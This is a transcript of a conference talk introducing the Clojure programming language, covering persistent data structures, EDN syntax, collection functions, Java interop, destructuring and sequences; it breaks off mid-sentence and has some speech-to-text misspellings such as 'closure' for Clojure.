Good morning everybody. I'll try that one more time. Good morning everybody. They're all out there on the audio. They just haven't had their coffee yet. My name is Stuart Halloway and I'm going to be talking to you today about closure, which is a programming language for problem solvers. And I want to start from first principles and talk about what I want software to be like. And this is something that we're, you know, working towards gradually. I want software systems to be knowledgeable, right? I want them to have valid and correct information about the world and tons of it. I want them to be powerful. And I want to feel powerful as a programmer using it. You get that high when you do something on the computer faster or easier than you thought you could before. It's just an amazing feeling. I want software to be flexible. How many of you have had the experience as a developer of having a business stakeholder come to you and ask for some feature which sounds really incremental? And you had to say to them, eh, I know that sounds really incremental, but actually given the way the system was architected, it's seeing the impossible. Or it's going to cost doubles. Anybody had that experience? That's a terrible feeling. I don't want that feeling. I want the opposite of that feeling where I make the software 10% more capable with 10% additional effort. And that's very tricky to do. I want my software to be smart. I want programs to anticipate my needs, to be out ahead of me, to have capable analysis. I want them to be effective. I want the decisions made by software to actually enact change in the world. Change in my world, change in the business world. I don't just want idle information, I want action. And finally, and this is really something that has become dominant in the past couple of years, I want software to be pervasive. I and all the users that I write for have an expectation that their software is going to be available how many hours a day. 24, right? Everybody expects 24-7 software. And where is the software going to be available? It used to be software ran in big installations. And then we had our own desktop machines. And then we had laptop machines. And now I have an expectation that I can carry a device in my pocket or on my wrist or in a bracelet that's going to be more powerful than the software that put man on the moon. And if that's not true, I'm going to be pretty disappointed. Now, we try to build, this is, and you know, I would say as a guy who's been in the industry for a while, this feels a little bit like scope creep in terms of what our users want. There was a time when we could have made them happy just having anything at all. But they get more and more demanding. Now, we have to build software in a world where we operate under certain physical laws. One of the physical laws that we operate under is that memory is very expensive. In particular, you probably wouldn't want a provision system with more than, I don't know, 100 kilobytes or so. Because it would be extremely costly to do. Secondly, storage is really expensive. And it's really slow and it's not random access. You have to get bits and bytes off of tape and put them back. So that's a big constraint that we operate under. And machines are really special and precious. Machines are not these anonymous things that you can trivially stand up and down. They're these expensive constructs. They're so special and unique that they're dedicated to tasks. We live in a world of dedicated machines. 
There's a special database machine somewhere. I know it by name. I call it Gandolf. You know, I get to know it. I swap its hardware out over time. And so, what's wrong with this slide? When was this true? 30 years ago. 30 years ago, right? I think, and, but the problem is that we are working with languages and technologies that are incremental improvements on designs from then. And basically what it comes down to is that the dominant paradigm for writing software in the industry right now is really the greatest hits of the 1970s. And this is a big problem and it's what we're trying to solve with closure. One of the problems that the 1970s give us is an approach to data structures that I'm going to call transients. So if you look at the way we store data, we have to store data transiently because memory is expensive and because storage is expensive, right? Remember, we can only have a couple hundred K of memory and, you know, storage is really pricey. And the effect of having storage be transient is that we have mutable data that we bang away at in place. And so, you see the effect of this on our building systems in a bunch of ways. If I have a data structure which is transient, I can't easily or comfortably share it with you, right? Because somebody might be changing it. It might erode out from under them. Likewise, it's difficult for me to distribute something that's transient because if it's transient, something's happening to it. And we all got to go back to the happening place, right, to find out what may have happened to it. Obviously, concurrent access of transient data structures is a catastrophe. Transient data structures have to be consumed eagerly because if you consume them lazily, by the time you get to them, they may have changed. And they're difficult to cache. Has anybody ever worked on problems of cache invalidation? You can't invalidate something that's persistent, but transient things invalidate all the time because they're changing out from under you. And everything is built this way. The collection APIs in Java are based on transient data structures. The collection APIs in.NET are based on transient data structures. Relational databases are based on transient data structures. And no SQL databases are based on transient data structures. So while I'm excited about no SQL as a movement, it hasn't really addressed what I consider to be the biggest problem yet. And all of this transience comes from a set of design principles that made sense when memory was a million times more expensive than it is now. Imagine how much your world would change if something else got a million times easier to do. Imagine if travel got a million times faster. Right, I live in North Carolina in the United States. It would categorically change the way we planned and organized events. If I could move back to the United States a million times quicker than I will, I'd in fact do tomorrow. We've had that million fold change and very few people have gone back and looked at how we write code and said, hmm, maybe we should do something different. Now, this transient data structure problem is the most important single example of a more general problem, which is complexity. And you know complexity by its symptoms. You have a nonlinear difficulty maintaining systems as they grow. Right, and this could be by any definition of growth. This could be by volume of data. This could be by volume of activity. This could be by size of code base. This could be by features. 
We've all had that experience that the system gets twice as big and how much more costly does it get to maintain? Even worse, we've had that experience of having the inability to make incremental change to a system. How many of you have some piece of your system that you're terrified to touch? Because you have no idea what's going to happen after you touch it. I mean, our programs are starting to be like the weather. Oh, I see the software is raining today. I have no idea how or why that happened, but I guess we'll just have to live with it. And then of course, in the limiting case, you have large efforts that fail entirely. And so you've probably already heard people throw about statistics about 50% of large IT projects fail, blah, blah, blah. Maybe you've had some experience with that. So we want to attack these problems, and closure is an effort to attack these problems. And it does it in several ways. The thing is that closure uses persistent data structures. I can tell you right now that if you learn nothing else from this talk, if you learn nothing else today, the most important thing you could take back to your job if you don't already use persistent data structures is to start using them. This is a language agnostic observation. You don't have to do the F-sharp pass persistent data structures. So there are places that you can go and get this regardless of what platform you're on. This is where the world is going for all the reasons that I said in the table on the previous slide. Closure is powerful and flexible. I feel like I'm able to get more done, and I feel like once I've gotten something done, I can change it and adapt it to my needs. One of the things that falls out of persistent data structures is functional programming. If I'm going to use persistent data structures, everything's immutable. And so I live in that world of FP. And where that tends to run aground is that we do want our programs to have effect in the world. And a purely functional system would just sit there and get warmer. It wouldn't have any input or output. And so there's a bunch of ways people deal with that problem in the functional languages. One way is to model time actually as functionally as well and use monads. And so there are functional languages that go down that road. Another way is to sort of punt a little bit and say, well, you know, use functional when it's suitable and use something else when it isn't. A third way, which is what closure does, is to say that identity in a system, something that's changeable over time, changes via succession of values. So you have an immutable value, and then you have another immutable value, and then you have another immutable value later. Closure is a Lisp. It's actually the least important of the points on here. Obviously, that hits you in the face when you first look at it, but I made the observation on the panel discussion earlier in the week that someone said, do we have too many functional languages? And I said, I don't think we have anywhere near enough. Just to pick one example familiar to heart, you could build a language based on all these principles except for Lisp, and you would have a language that doesn't exist in the current ecosystem. There's not a choice out there that has closure's characteristics minus being a Lisp. Finally, closure is designed by and for professionals for building professional software. It is not designed for hobbyists or entertainment. It is not designed for newbies. It is not designed for academic use. 
People do all those things, obviously, but when the rubber meets the road and decisions have to get made in the language, the language is squarely aiming at expert professionals getting shit done. So let's look at the language. Closure is built on top of a data format called the Extensible Data Notation, or EDEN. And when you see EDEN in a moment, you're going to think JSON, and it is similar superficially to JSON, and we would have used JSON except we needed the following three characteristics which JSON does not have. We needed a richer set of built-in data types. JSON has string, which ends up having to get multipurpose for a lot of different things. We wanted a generic mechanism for extensibility, so the ability to add new kinds of data structures without requiring existing serializers or consumers to have to know about them in order to do their work, and language neutral. And we didn't want to get into the object game at all. So I sort of think of my experience with data serialization as a sort of Goldilocks and the Three Bears kind of story where, you know, XML is too hot and JSON is too cold and EDEN is kind of just right. And the sense in which it is just right is that it is richer in its data capabilities than something like JSON, but it does not run off the rails in trying to pursue identities or objects or things like that. And for those of you who have done this stuff for a long time, if you remember things like SOAP Section 5, that's the kind of catastrophe that I'm talking about. So let's take a look at EDEN notation. We have strings, they're double-quoted. In Java or C-sharp, there will be strings. We have characters led by a backslash. There will be characters. We have integers, doubles, booleans, true and false. We have nil. The word nil as opposed to null comes from the Lisp world. We have ratio types, and then we have two types that can represent names. We have symbols, which just look like words, and there's a rich set of legal characters, so, you know, plus sign also could be a symbol. And then we have keywords, which just look like words with a colon stuck in front of them. Most of this lines up fairly well with syntax in C-sharp or Java or JavaScript as far as it goes. Then there are four collection literal types. A list is demarcated by parenthesis, and it suggests something that's going to be seen sequentially. So there's a presumption when something is serialized as a list that when you read it back, you're going to get something that is O of n to traverse it. Vectors, on the other hand, are associative collections by index. So the presumption is if you have something that's in the square brackets, that's something that you could efficiently look up the guy at the end in O of one time. Maps are key value pairs. So here we have the keyword A pointing to the value 100, and the keyword B pointing to the value 90. And sets are collections where you have membership. So here we have a set containing the keyword A and the keyword B. I will mention, and you see it here on the slide, commas are white space. So if you want to, you can go back and add commas into this code. And maybe when you get started, you know, you're initially programming and closure or writing Eden data, you will. And then you realize all the time you can save by never having to type a comma again, and you'll stop doing it, or at least most people do. Now, the funny thing is that I have just taught you the closure programming language. 
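To make that concrete, here is a small sampler of the EDN literals just described (EDN, the Extensible Data Notation, is what the transcript renders as "EDEN"). This is an illustrative sketch, shown as data rather than as code to evaluate, not a copy of the actual slide:

```clojure
"hello"             ; string, double-quoted
\c                  ; character, led by a backslash
42 3.14 true nil    ; integer, double, boolean, nil
22/7                ; ratio
my-symbol +         ; symbols (rich set of legal characters)
:a :first-name      ; keywords, a colon stuck on the front
(1 2 3)             ; list   - read sequentially
[1 2 3]             ; vector - associative by index
{:a 100, :b 90}     ; map    - key/value pairs (commas are whitespace)
#{:a :b}            ; set    - membership
```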
I've taught you the entire syntax because as a Lisp, Clojure programs are written in data. They're not written in text, and they're consumed as data, not as text. So we take data in EDN, it's actually a superset of EDN, deserialize that into data structures, and that's actually what your program is made of. So here's Hello World. If I interpret Hello World as a piece of data, I see a list containing a symbol, println, and a string Hello World. If I interpret it semantically, I say, oh, the first symbol in a list is the name of a function to be invoked. So that is println Hello World. Now let's define a function. So here, this is the canonical syntax for defining a function in Clojure. Defn, define a function, greet the function name, a documentation string, an argument list, in this case a single argument, your name, and then str, in this case, is taking two arguments and sticking them together and making a string Hello your name. But notice that this has not introduced any new syntax. I could also analyze this purely as data. So this is a list containing a symbol, a symbol, a string, a vector with a symbol in it, and a list with a symbol, a string, and a symbol. It's all made out of data. So it's 9, 14, and 52 seconds. That's how far we are into the talk. You now know Clojure. So we're just going to take a deep breath for a minute and enjoy the fact that it was so easy to learn the language. So now let's get back to those benefits that I wanted to acquire as a software developer when I'm building systems. I want to be powerful and knowledgeable. And to be knowledgeable, I actually have to have knowledge. I would submit that C sharp and Java and relational and no SQL systems actually don't have knowledge in them. They have machines in them. And you can go and look at the machine, and then you can come back later and look at the machine and what will have happened. It will have moved. It will have moved into some different position. And persistent data structures are a different approach to that. They are immutable, so they can't change. The only change in the world is by function application. Another way to say this in an object-oriented setting is the only way new stuff happens is via constructors. That's a sort of capsule way to put it. Imagine a world where no objects had setters ever. Everything only had getters, and you only made new things via constructors. That's what we're talking about here. Now, of course, in order to do that, we can't be naive about it. And so we have to have good performance, which means that these persistent data structures actually share structure internally. So I'm not suggesting that if you have a map with 100 items in it, and then you create another map that's exactly like that map, but with one more, we now have 100 more things in memory. Those things can share data together and maintain full fidelity access to old versions. So let's go back and look at the characteristics we get out of making these choices. Sharing transient data structures is difficult. They might change out from under you. Sharing persistent data structures is trivial. If I alias something and 100 people are looking at it, what could possibly go wrong? They can't change. Distribution is not trivial, but it goes from being difficult to easy, particularly when you combine it with something like content addressing. I can take big data structures, and we can share them and refer to them by their hash if we want. And once you know you've got it, you can cache it forever.
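Stepping back to the greet example for a moment, here is a hedged transcription of what those two examples likely looked like in source. The exact slide text isn't captured in the transcript, so treat this as a sketch:

```clojure
;; Hello World: a list whose first element names the function to invoke
(println "Hello World")

;; Defining a function: defn, name, doc string, argument vector, body
(defn greet
  "Returns a greeting for the given name."
  [your-name]
  (str "Hello " your-name))

(greet "NDC")   ; => "Hello NDC"
```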
Concurrent access is also trivial. Everything in Clojure is safe for concurrency and safe for being looked at by multiple observers. The access pattern is your choice. You can consume things in an eager fashion or in a lazy fashion. And obviously, caching is easy because things can just stick around forever. What things look like this today? A lot of functional languages support this, so Clojure, F-Sharp, and on the database side, Datomic has the entire database as a persistent data structure. Now, having made data this way, we want to have power over our data. In the OO world, we get power over our data by having a proliferation of concrete classes. So I'm going to have the person bean and the account bean and the order bean and the order line item bean, that sort of thing. In a functional language, we follow more with Alan Perlis, who said, it's better to have 100 functions that work with one data structure than to have 10 functions that operate on 10 data structures. Or in OO, what do we end up having? It's three or four or five functions on thousands of different data structures. And so every time you sit down to write a program, there's a brand new API that somebody made up. In Clojure, every time you sit down to write a program, there's an existing API, and the API is Vectors, Maps, Lists, and Sets. So let's look at those. We'll start with Vectors. Here's a short program that defines the name V to be a vector containing 42, the keyword rabbit, and a sub-vector 1, 2, 3. I should mention, by the way, here, that everything nests. So all the different data structures you've seen nest inside each other arbitrarily. That's generally not true in programming languages that have a lot more syntax. Go to the top of your C-sharp or Java file and write a for loop around your import statements. And you'll get an idea of the kind of thing that I'm talking about. Because things don't nest, there are rules about what you can put where, and you get in trouble, and the compiler will not let you move forward if you don't do that. So now having created an associative data structure, associative data structures act as functions. So instead of saying get from V the item at the index 1, I just say V of 1. That's the item at index 1 in V, and obviously we're zero based, so it's not going to be 42, it'll be rabbit. I can peek at a vector, in which case I will see the thing at the end, 1, 2, 3. I can pop a vector, in which case the thing at the end gets popped off, so the 1, 2, 3 should be gone. And I can take a sub-vector of a vector, so here give me the vector starting at 1, so 42 falls off the front. All of those things are constant time operations. Now let's take a look at a map. So here's a map with three key value pairs, A 1, B 2, C 3. Again, maps are functions, and so instead of saying get from the map B, you just say map of B. Keywords are also functions that look themselves up in collections. So everywhere in an object-oriented language where you'd be saying dot get first name, dot get last name, in an idiomatic Clojure program you would be saying colon first name in function position, the first slot in that list. So colon B of this map, and that guy's going to be 2. I can get the keys out of a map, so there's A, B, C. You can also get the vals, and that would return 1, 2, 3. I can make new maps, so here's an example of one of those constructors. Assoc takes a map and some key value pairs and returns a new map. So here I'm taking the map M, assoc-ing in D 4 and C 42.
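The vector and map operations just described, written out as a hedged sketch. The values match the ones mentioned in the talk:

```clojure
(def v [42 :rabbit [1 2 3]])

(v 1)           ; => :rabbit      (vectors are functions of their indices)
(peek v)        ; => [1 2 3]      (the thing at the end)
(pop v)         ; => [42 :rabbit]
(subvec v 1)    ; => [:rabbit [1 2 3]]

(def m {:a 1 :b 2 :c 3})

(m :b)                ; => 2      (maps are functions of their keys)
(:b m)                ; => 2      (keywords look themselves up)
(keys m)              ; => (:a :b :c)
(vals m)              ; => (1 2 3)
(assoc m :d 4 :c 42)  ; => {:a 1, :b 2, :c 42, :d 4}, and m itself is unchanged
```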
Now C used to be 3, obviously that gets overwritten. Although we should be careful about the use of the word overwritten. What happened to M when I did that? Absolutely nothing. I returned a new object that had those characteristics. M is still as it was, and I can dissociate keys from a map. So dissociate D from M. And then you can get to some more advanced ones. So merge with is a function that takes a function. So this is a higher order function when people talk about functional programming doing higher order functions. This says combine M with A2 and B3, but instead of overwriting values where they collide, combine them using the combining function passed into merge with. So in this case merge with is being the pasta plus sign. So it says oh I see, A used to be 1, but I passed in A2. I combine those, 1 plus 2 is 3. And you can go further with dealing with say nested structures. So let's imagine I have a nested structure. John Doe has a name, but John Doe has an address, and the address is actually nested further. The address has a zip code in it. There's a function called get in that will take a data structure and a list of keys and walk the path of keys down to what you're looking for. So that says walk the path of keys from address to zip, so that's going to return 27705. You can also use this to update data structures. So assoc in is the recursive generalization of assoc. It says take this data structure, drill down into it somewhere, and then make a change at that place. So now I've changed the zip code to 27514. And perhaps even the more interesting one is update in. Update in takes a data structure and a path and a function. And it applies that function to whatever finds in the path. So here I can say go to JDoes, address zip, and increment it. So it would go from 27705 to 27706. In a certain sense this is trivial. In fact, it is trivial. On the flip side, if you built an OO program, there would be a special class that represented the person and a special class that would represent the address. And then it would just be busy work to navigate through it because there wouldn't be a generic access path like this. So let's look at sets. Closure has some extensions for set in the set namespace. So that loads an additional namespace. You don't need this for the literals, but you need it for some of the functions. I'm going to define the colors to be red, green, and blue, and the moods to be happy and blue. I can disjoint from a set. So if I disjoint red from red, green, and blue, I'll get back green and blue. I can take the difference between two sets. So the difference of colors and moods subtracts out the stuff in moods. So I subtract out blue and then up with green and red. I can take the intersection of colors and moods. And I can take the union of colors and moods. Not shown here, but I leave it for you to go play with. How many people feel like they have a grasp of the relational algebra that underpins SQL? Anyone been there, done that? So closure.set the namespace implements the entire relational algebra on Closure's data structures. So you can just go in there and party on and project and join and whatever you want to do. So that's generic data structures. I want to feel powerful. And this is pretty darn easy to summarize. The way I want to feel powerful is I want to have bare metal access to my platform. A lot of people mistakenly divide the world into two kinds of languages. 
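A hedged sketch of the nested-map and set operations described above. Note that the set function the transcript renders as "disjoint" is spelled disj, and "the pasta plus sign" is the plus function passed in to merge-with:

```clojure
(def jdoe {:name "John Doe"
           :address {:zip 27705}})

(get-in jdoe [:address :zip])           ; => 27705
(assoc-in jdoe [:address :zip] 27514)   ; new value with the zip replaced
(update-in jdoe [:address :zip] inc)    ; zip becomes 27706

;; merge-with, from the map discussion: combine colliding values with +
(merge-with + {:a 1 :b 2 :c 3} {:a 2 :b 3})   ; => {:a 3, :b 5, :c 3}
(dissoc {:a 1 :d 4} :d)                       ; => {:a 1}

(require '[clojure.set :as set])

(def colors #{:red :green :blue})
(def moods  #{:happy :blue})

(disj colors :red)               ; => #{:green :blue}
(set/difference colors moods)    ; => #{:green :red}
(set/intersection colors moods)  ; => #{:blue}
(set/union colors moods)         ; => #{:red :green :blue :happy}
```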
One kind is languages that are at the metal, platform languages, and the other kind is languages that are highly expressive and friendly to the programmer. That's a false dichotomy. I want both, please. And so Clojure provides direct access to the platform. You can construct things on the platform. Most platforms, it's going to be new class name, some argument. In Clojure, it's always the verb first. One of the things about Clojure is all action in the world always comes in the first position of a list. So when you get ready to start metaprogramming, it's a beautiful thing. Everything works the same way. So making a new thing, you see the class name in function position. That says make a new red widget. Static members, Math.PI on the platform would become Math slash PI. Instance methods, rand.nextInt would become .nextInt on rand. Notice again, perfect consistency across the language. Verb always comes first. Grabbing an instance field would be pixels.data on the platform and would be .data pixels in Clojure. You're not going to see this one very often because even though I wish they would, idiomatically Java and C-sharp programmers don't encourage you to access the fields of their classes. They tend to make them private. The place where you will see that syntax quite a bit is if you're writing a Clojure program that's targeting JavaScript. Because in JavaScript, people do that all the time. Yes. So there are three platforms, I think, that are super important. And they are Java, the CLR, and JavaScript. There could be others, but those are the three big important ones. When I say bare metal, I mean access to the platform. I mean specifically, if I'm writing a Java project, I don't want to have to drop to Java to do some high performance thing. Now, I am not talking about dropping underneath garbage collection. So I'm not talking about dropping to JNI or whatever the platform access is called in C-sharp, I can't remember. Yeah, P/Invoke. I'm not talking about dropping to that level. And I'm not talking about competing with the C guys for their bare metal. So I'm not going there. I am talking about platforms that are garbage collected, virtual machine platforms. So chaining access on the platform, it's x.y.z. In Clojure, it's dot-dot at the beginning. And then that says, that's the recursive generalization of do something, right? So person.getAddress.getZipCode. You don't have to write the dot again and again. I will point out that a lot of people, when they first look at Lisp, they make this snide joke on Twitter about punctuation. But if you go back and look through these slides, Clojure has fewer parentheses than the same code in C-sharp or Java would. And furthermore, it has no commas. And let me tell you, I have been writing code in an Algol syntax language for the last week, and it is murder to have to type commas. I feel for people who have to type commas when they're writing code. You can implement interfaces in Clojure with a form called reify. So this says reify Runnable and implement the run method to print hello. And I have one example just to demonstrate my point about platform power. It's actually a JavaScript example. And you can go and read this article. Some of you may have seen David Nolen. He's here speaking at the conference. He's the lead developer on ClojureScript. And he has been doing benchmarking to verify that ClojureScript can do anything that JavaScript can do, so that there's no need to drop down to JavaScript. And so he put together this demo, which I will attempt to open.
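Before that demo, a hedged sketch of the interop forms just mentioned. The Widget class is a placeholder from the slide description, not a real class; the string and Random examples are runnable stand-ins:

```clojure
;; Construction: the class name goes in function position, verb first
(java.util.Random.)          ; new java.util.Random()
;; (Widget. "red")           ; hypothetical class: new Widget("red")

;; Static members
Math/PI

;; Instance methods
(def rng (java.util.Random.))
(.nextInt rng)

;; Instance fields look like (.data pixels); rarely seen on the JVM,
;; common when targeting JavaScript

;; Chained access with .. (the recursive generalization of the dot)
(.. "hello" toUpperCase (substring 0 3))   ; => "HEL"

;; Implementing an interface with reify
(def r (reify Runnable
         (run [_] (println "hello"))))
(.run r)
```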
So this is a port of Notch's JavaScript performance demo. So this is a purely calculative exercise. This is a processor burning thing. It's doing a Minecraft simulation internally. And David has been verifying that ClojureScript is neck and neck with JavaScript at this. And this is even doing things like icky, mutable, imperative, at the bottom of the rendering level, loop stuff. So I would encourage you to check this out if you're skeptical about claims of platform performance. You could do similar experiments with Clojure running on the CLR or Java. Oh, and you know what? I need to turn that off because it literally will burn one core. So my machine would start to sound like a fan. Its job is to use a core as fast as it can. So I would summarize the Platform Interop story in Clojure as simple, wrapper-free. And this is a big deal. The minute you have wrappers talking to Java or CLR or whatever, then you're no longer in the world of getting the direct stuff. You're now in the world of having a value-added service, which becomes a value-subtracted service when you want to do something different. It's performant and it's conformant. It gives you access to the features of the platform. So I'm feeling pretty knowledgeable and powerful. I want to talk now about feeling flexible. And so a big piece of feeling flexible in a language like Clojure is that the work style is interactive. There's this website. You can go check it out called Tri-Clojure. Tri-Clojure runs a Clojure REPL in the browser. And you can go and just start programming. There's also a website called Himera. Himera is a Clojure script REPL running in the browser. Now, because we have only an hour today, I'm not going to do an extended demo of what it's like developing at the REPL, but I want to talk about it. I had dinner last night with Neil Ford, who will be speaking later today. And I was asking him, he's at ThoughtWorks. I said, how do people develop code in the agile world these days? What's the pattern? How do I move quickly? And he said, I think that it's primarily, it's not necessarily test-driven, but it's keeping the test green. It's having a fast feedback loop and you code and you see the test pass and you code and you see the test pass. That's the people who are working the fastest how they work. I don't work like that. The way I work, I would describe as literate planning. I'm people familiar with Nooth's literate programming, the idea that your program would be a document. There are a bunch of people in the Clojure community who are into that. I'm not going to say that I'm that far, but I do most of my work as a programmer, either in a drawing tool, an OmniGraphil, or in an outlining tool. And inside the outlining tool, I have snippets of code that I send to the REPL for evaluation and gradually build up larger and larger programs. I tend not to write unit tests almost ever, because by the time I've done exploring at the REPL, I've produced a pure function, which I've seen to work on a variety of inputs. Instead, I write generative and simulation tests, which are at a higher level. So generative tests will manufacture inputs of different kinds for functions and then verify assertions about those functions. And then simulation tests, really, I think that B's needs in testing, is having a database of activity simulating real-world activity against your system and running it that way. If you're interested in that, I am giving a talk on simulation testing. 
I think not in the next slot, but the slot after that this morning. But the point I want to make here is that this interactive style of development is incredibly rapid, and it's quite a bit different from IDE-driven development or test-driven development. In addition to that interactivity and being able to build a system quickly, I want to work in a dynamic language. So Clojure is a dynamically typed language. You notice that we had a bunch of data structures up there, but there weren't any classes or types or any of that stuff. And I want to show you what this feels like by refactoring a piece of common Java code into Clojure. So this method is from a library called the Apache Commons. If you have been in the Java community for more than five minutes, Maven, while it was downloading the Internet onto your machine, certainly downloaded the Apache Commons, because it's used, it's a utility library that does common things that Java doesn't ship with. And so this particular, you can try to read it, this particular function is a validator function that verifies that a string is blank. And the way that a string is blank is, well, if it's null, it's blank, and if its length is zero, it's blank. And then the complicated part, if it's got stuff in it, but all of that stuff is white space, then it's blank. So I'm going to take this idiomatic Java code, and I'm going to refactor it to idiomatic Clojure code. So I'm going to remove the type declarations, and this is what people think about when they're coming from a statically typed language to a dynamically typed language. They picture the code that they had with all the types removed, right? And I agree with you that that would be a catastrophe, right? If I stopped here, we would be in a bad place, because basically what I just said is you live in a tar pit with good maps, and now you live in a tar pit with no maps. So we've gotten rid of the maps, now let's get rid of the tar pit part. So I'm going to get rid of the class, because we're just going to make a function, and I'm going to introduce a higher order function. We don't have a higher order function syntax in Java, so I'm just going to make this up. So I'm going to say for every ch in str, the character is white space, and you can sort of imagine what that does, right? That's an expression that returns true if it's true for every guy in the collection. Now, one of the great things about this higher order functional style of programming is once you've written it that way, all those corner cases around it actually disappear. So now I have: is blank of a str is, every character in str is white space. And then I'll actually drop down to Clojure syntax. Now, if you compare this with the strongly statically typed slide at the very beginning, this is the kind of advantage that I'm talking about of writing code in a dynamic language. And you end up with a very, very small number of very short, very general purpose things. And these pieces all have to fit together, because if everything wasn't shorter, that would suck, because I would still want to have the roadmaps that static typing gives me. I wouldn't want to go here. And if I had to make as many things as I would have to make to build an OO system, I'd still want the types. But I make 10 times fewer things on small Clojure programs, and 100 times fewer things on large Clojure programs than I would make if I had to write them in OO. I absolutely would. So the question was, would you say that it makes a difference which static language you're using?
Yes, I think that the reasons that dynamic is better become much more subtle and nuanced when you compare it to something like ML. And I would be perfectly happy. And this is a point I should have made on the static versus dynamic panel earlier in the week. I think we should all get into functional, and then we can argue about the static and dynamic thing, you know, once we're at the end of the road. Because I consider that static dynamic debate is really kind of tiny compared to we need to be more functional and less imperative. And so I think that closure and F-sharp and Scala and ML and OCaml and all these guys, we should all, we're all on the same side here, right? We are all fighting for truth and justice together. So, intelligent. What makes systems intelligent? One thing that makes systems intelligent is being able to specify, do what I want or do what I mean, not how do you do this. And one aspect of that is being declarative. I'm going to give one example of a declarative DSL enclosure that's called destructuring. And the idea behind destructuring is I want to have a way to bind multiple names. I already showed you how to bind one name, right? DefX or letX, right? But I want to be able to bind multiple names, and I want to work against the abstract structure of what I'm working on. So I don't want this to commit me to concrete types. It's, again, another dynamic argument. And I want this to be available everywhere. So anywhere in the language where I would bind names, I want to be able to do this. And there's going to be two forms of it. I'm going to have a vector form, which is going to do sequential destructuring. And I'm going to have a map form that does associative destructure. This is probably the hardest really early roadblock for people in closure unless it's motivated. So I'm going to show an example whose intention is to motivate it. Let's imagine that I was writing a function to make the Fibonacci numbers. In order to make the Fibonacci numbers, I need to maintain two items of state, right? Because every Fibonacci number is built from what? The previous two. So I have to do something pair-wise and then maybe trim that down to actually see the Fibonacci's. So I've written this function next Fib pair, which takes a pair of numbers, and then it makes the second number, the first number of the new pair, and it makes the sum of the two numbers the second number of the new pair. And the problem with this, and then I iterate over it, by the way, iterate is a higher order function that produces an infinite collection. So iterate says take that seed and then do the recursive generalization of whatever the function is. So take 0, 1, call Nick's Fib pair on that, and then on the result, and then on the result, and then on the result, and then on the result. So that produces a sequence from which I can then extract the Fibonacci numbers. But the thing I don't like about this is that there's a lot of noise for picking apart the pair. And so what closure lets me do is you can add this extra pair of square brackets anywhere where you're binding names, like in a function definition, and that extra pair of square brackets says, I don't want to bind a name to the thing that I was given. I want to destructure it. I want to break into it, and I want to bind A to the first piece of it, and B to the second piece of it. And the thing about these kinds of syntactic improvements is they snowball, right? 
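A hedged reconstruction of that Fibonacci example, showing sequential destructuring in the argument vector. The function and argument names follow the talk's wording but the exact slide code is an assumption:

```clojure
;; Without destructuring: pick the pair apart by hand
(defn next-fib-pair [pair]
  [(second pair) (+ (first pair) (second pair))])

;; With destructuring: the extra square brackets bind a and b
;; to the two halves of the incoming pair
(defn next-fib-pair [[a b]]
  [b (+ a b)])

;; iterate produces the infinite succession of pairs;
;; mapping first over it extracts the Fibonacci numbers themselves
(take 8 (map first (iterate next-fib-pair [0 1])))
;; => (0 1 1 2 3 5 8 13)
```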
Because that next Fib pair function is so short and so beautiful now, I'm not going to bother to give it a name, right? I'm going to drop it down to where I'm actually doing the job. And that's the kind of thing that allows you to make categorical improvements in the readability of your code. Because now you can say, now you have control of locality, where I had things that were apart, I've now brought them together. I'm not saying you should bring everything together. I'm not suggesting one giant do all function. But I am saying that having the ability to choose where to bring things together allows you to write expressive code. Associative destructuring works the same way. We bind names by keyword lookup. I'm not going to look at this. Let's get past this. The only other example of a little bit of declarative programming that I want to show you, this is another little DSL that's in closure, is solving the actual problem of Lisp for beginners. The actual problem with Lisp is not parentheses. I already showed you that there are less parentheses in idiomatic Lisp than there are in idiomatic Java or C-sharp. The problem is things look inside out. And I'll show you how that starts to happen. So here I have a map. Jonathan's password is secret. And now I want to associate something new onto it. So notice a social appears outside it and the nickname John appears on the other side. So I'm building up on the left and right of the thing I started with. I'm building out. And then I decide to dissociate off the password because I don't want anybody to see that. And now you start to see this thing that builds up inside out. And most programmers, most humans, don't like to read things inside out. How do they like to read things? Left to right. So Clojure has a macro called thread first that reorders programs from inside out to left to right. There's another macro that reorders things from inside out based on the last argument instead of the first argument. So there's actually two flavors of this. But the point is, I guess there's a couple of points. One is, it's one thing to say I don't like inside out reading, but I want to have a language where I can decide what order I do things in. So in Clojure, I could choose to go left to right. I could choose to go inside out. I could be perverse and implement my own macro that made you read things right to left or top to bottom. Or bottom to top. That seems a little crazy. But the thing about this that's important other than just doing it is that these capabilities are built in Clojure. So this is extending the language itself by making these changes. So these DSLs are what you'd call internal DSLs, right? You can do this right in the language. A second thing that's going to make me feel functional is having a powerful set of persistent data structures. We've already talked about this. But I skipped one on purpose. I said we're going to look at maps, vectors, sets and lists, but we didn't actually. Do you remember which one we skipped? I showed you API for three of the four. A lot of stuff coming really fast. So the one we skipped is lists. I didn't show you any functions for manipulating lists. And the reason that I didn't is that in Clojure, you don't actually think about manipulating lists. You think about sequences as an abstraction over any kind of collection. And so the sequence library, although the syntax of the things that are going to be returned, they're going to print with parentheses around them, so you're going to go, oh, that's lists. 
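Circling back to the threading example for a moment, here is a hedged sketch of the inside-out version versus the thread-first version, using the map from the talk:

```clojure
;; Inside-out: each new operation wraps around the previous one
(dissoc
  (assoc {:name "jonathan" :password "secret"}
         :nickname "jon")
  :password)

;; Left to right with the thread-first macro
(-> {:name "jonathan" :password "secret"}
    (assoc :nickname "jon")
    (dissoc :password))
;; => {:name "jonathan", :nickname "jon"}

;; ->> is the variant that threads the value in as the last argument instead
```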
They're actually not lists. Sequence is an abstraction over any kind of collection. So sequence is built at the bottom on first, rest and cons. First returns the first item in a collection. Notice that I'm not using it with a list, though, to my point. First is working here with a vector. Rest returns the rest. And cons sticks something on the front. Take and drop are recursive generalizations. So take 2 gives me the first two things. Drop 2 gives me everything else after I skip past the first two things. I can apply predicates and higher order functions. So I've got every, not every, not any and some for picking apart collections. And my collections can be lazy or infinite. So you already saw making the Fibonacci's. Here you have the whole numbers. Iterate inc 0 makes the whole numbers. Cycle 1 2 returns me an infinite collection of 1, 2, 1, 2, 1, 2. Repeat D returns an infinite collection of Ds. I don't actually have infinite business data, but it is nice to be able to treat things that way. I mean, where you see infinite, actually think streaming through data larger than memory. I have a big data job and I want to stream through it. This is really powerful. And of course, map, filter and reduce. So here we have another API, range, which gives me a range up to a number. So range 10 is zero through nine. And then I'm showing you map, filter and reduce here. So filter subtracts out of a sequential thing, or actually keeps in a sequential thing, things that match a predicate. So keep, out of this sequence, all the odd things. Map, sometimes called collect or select, depending on your language, says pluck. Call this function on every item in the collection to give me the results. And then reduce walks a collection with an accumulator. And so I'm just 